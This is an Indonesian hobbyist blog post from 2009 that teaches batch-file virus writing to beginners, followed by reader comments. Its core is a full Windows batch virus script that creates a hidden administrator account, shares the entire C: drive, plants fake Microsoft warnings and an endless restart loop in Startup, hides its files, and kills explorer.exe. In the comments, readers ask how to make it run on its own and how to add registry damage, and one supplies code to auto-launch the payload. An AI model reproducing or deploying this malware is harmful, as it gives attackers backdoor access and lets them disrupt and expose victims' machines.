MorphostLab

Tempat nongkrongnya Morphic dan kawan-kawan

Pemrograman Virus Batch untuk Pemula (2)

Posted by Morphic pada Mei 14, 2009


Saya yakin disekitar anda pasti banyak sekali orang-orang yang sok tahu soal virus. Padahal kamu sendiri adalah VM. He he he.. yah maklum sajalah. Memang banyak sekali orang yang kayak gitu. Ciri-cirinya:
-kalo ngomong soal virus seolah-olah tahu lebih banyak padahal gak tahu apa-apa.
-sangat mendominasi kalo ngomong soal virus
-sok memberi info soal virus (padahal info yang dikasih tahunya salah).
-yang terakhir yang lebih parah, ngomong soal virus didepan kita … (kita = VM).

Yah, semua orang pasti pernah ngalaminnya. Ada teman saya yang bilang “kalo virus dibiarkan lama bisa menyerang semua file”.
Ha ha ha… itu omong kosong.
Gak ada hubungannya semakin lama virus dibiarkan bisa menyerang semua file. Yang benar itu, begitu virus dieksekusi virus akan menjalan semua command yang udah kita perintahkan. Yah kecuali memang udah ada di pasang penanggalannya. Misalnya tiap tanggal sekian virus akan bla bla bla… yah… begitu…

Yang perlu anda lakukan untuk menghadapi orang-orang seperti itu, kamu gak usah pamer skill.. yah biarkan aja dia tahu sendiri kalo kamu adalah VM. Dan yang perlu anda lakukan sekarang adalah meningkatkan dan menajamkan skill-mu sebagai VM.

Kalo kamu dah betul2 master di VB ato C++ ato delphi, gak ada salahnya kalo mempelajari batch juga…

Setelah lama browsing kemana-mana, akhirnya saya udah kumpulkan banyak script virus batch, dan diantara itu semua saya memilih script berikut:

Nama virus ini C_relwarC708 v1.0 yang dibuat oleh Technocrawl’s core member
Makan nih script…
@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls
rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul
net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt
rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators Microsoft_support /add
rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED
cd %SystemRoot%\system32\1001
echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs
rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y @ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”
rem ****************************************************************************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y
echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”
rem ****************************************************************************************************************************************
cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\
cd %systemroot%\system32
attrib +h +s +r 1001
rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
taskkill /F /IM explorer.exe
rem @ EOV // End of Virus

yang paling menarik dari script di atas penggunaan mssge box-nya…
Ternyata dari batch juga bisa loh bikin mssgbox!

Ini nih aturannya:
msg * ”ketik pesan anda disini”

Simple kan? Ini beda dengan VB yang biasa kamu pake.

by: Morphic
thanks to:
MorphostLab

22 Tanggapan to “Pemrograman Virus Batch untuk Pemula (2)”

  1. Thanks for the marvelous posting! I truly enjoyed reading it, you might be a great author.
    I will make sure to bookmark your blog and will come back at some point.
    I want to encourage continue your great job, have a nice day!

  2. Excellent weblog right here! Additionally your website rather a lot up fast!
    What web host are you the use of? Can I am getting your associate link in your
    host? I desire my site loaded up as fast as yours lol

  3. Benny said

    Link exchange is nothing else except it is just placing the other person’s web site link on your page at proper place and other person will also do similar
    for you.

  4. Mas morphic,, aku mau nanya…. bagaimana caranya mematikan process yang mengu\gunakan teknik UNICODE….????

  5. Morphic said

    kapan-kapan bakal aku kasih code virus yang lebih nakal…

  6. yraG said

    caranya gmana phic, buat wscript ada timer-nya?
    and, kadang2 kok, ada yang gak bisa ya wscriptnya di kompi yang lain????
    kenapa sih tu phic….????
    thx…

    • Morphic said

      yang dibilang si andi udah benar tuh…
      wscript.sleep 1000

      malah itu ampuh banget. Belakangan ini kebanyakan virus bikin intervalnya sekitar 10000-20000…

      kalo yang dikasih ama si andi itu permainannya udah per detik loh..

  7. Andi said

    oh gitu… setelah gw install flash player dari situs itu malah jadi aneh komputer gw.. mungkin flash playernya itu virus x ya..

    • Morphic said

      mungkin juga sih ndi…
      mungkin flash playernya itu virus…

      tapi sayangnya aku belum periksa tuh file. jadi aku belum pastiin itu virus atau bukan….
      tapi kalo dilihat dari ukurannya, terlalu besar untuk sebuah virus…

  8. Andi said

    Bos, mungkin gk sih buka situs bs kena virus? Gw buka ni situs kok bs kena virus ya? Mohon penjelasannya.

    • Morphic said

      kadang-kadang bisa juga… kalo halaman yang kita buka itu disisipi kode “sensitif” (maksudnya kode virus).
      untuk situs yang kamu tunjukkan itu udah aku lihat sourcenya…

      Manohara Odelia Pinot Movie
      body {background-image:url(matrix.gif); background-attachment:fixed; background-position:center right; background-repeat:yes; background-color:#000000; }
      body { cursor:url(“http://www.PimpingYourSpace.com/Cursors/Skulls_Cursors/cursors/FlamingSkull.cur”),default; }

      a,a:link,a:visited,a:active,a:hover { cursor:url(“http://www.PimpingYourSpace.com/Cursors/Skulls_Cursors/cursors/FlamingSkull.cur”),default; }

      itu cuma sepotong scriptnya. untuk lengkapnya lihat sendiri….
      dan halaman ini juga berusaha untuk menunjukkan icon kursor yang beralamat di:
      http://www.PimpingYourSpace.com/Cursors/Skulls_Cursors/cursors/FlamingSkull.cur

      bagus loh kursornya….

      ya intinya tadi itu, virus bisa muncul dari halaman web yang kita buka kalo ada script sensitif yang terkandung dalam halaman tersebut.

  9. yraG said

    phic, kalo pake bat, kagak bisa real time kan virus nya ya??
    .vbs juga kan ya???

  10. decki said

    pic kalo cara nyari crc32 virus gmn yah????? aku akn dah dapet source WAV aku ada baca tuh ada di taruh crc32 nya virus2 apakah dengan aku menambahkan crc32 virus2 tuh antivirus bisa dapet virus n basmi?? ato harus di tambah2 lagi code2 nya???? pic bantuin buat form antivirus dunk…ato lu ada form second yang ga lo pakek buat aku..^^..punya lo yang lama juga boleh pic

  11. decki said

    sory pic aku lom baca2 kemarin setelah aku baca2 n aku praktikin aku dah ngerti 90% virus ini…^^… tapi sayang dalam bentuk .bat lom bisa jalan.
    pada script ini echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs—-> kayaknya keren aklo di tambahin virus vbs misalanya merusak regisrtry,,, aku masih belom ngerti cara supaya jalan sndiri tanpa harus d klik…TT

    • Morphic said

      ya memang,
      si virus bat memanfaatkan file vbs utk bikin mssge box..
      virus baru bisa hidup waktu dieksekusi, ya contoh pengeksekusian seperti “harus diklik” atau dengan start up

    • Andi said

      Menurut gw si masi bs dieksekusi dr bat. Tambahin aja kode ini :
      %systemdrive%
      cd “%systemroot%\system32\1001”
      start warnusr.vbs

      Untuk timer vbs kalo gk salah :
      wscript.sleep 1000

  12. decki said

    pic ada penjelasan tentang virus ini????? masih lom ngerti fungsi2nya…tolongin donk di jelasin kalo bisa…^^

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: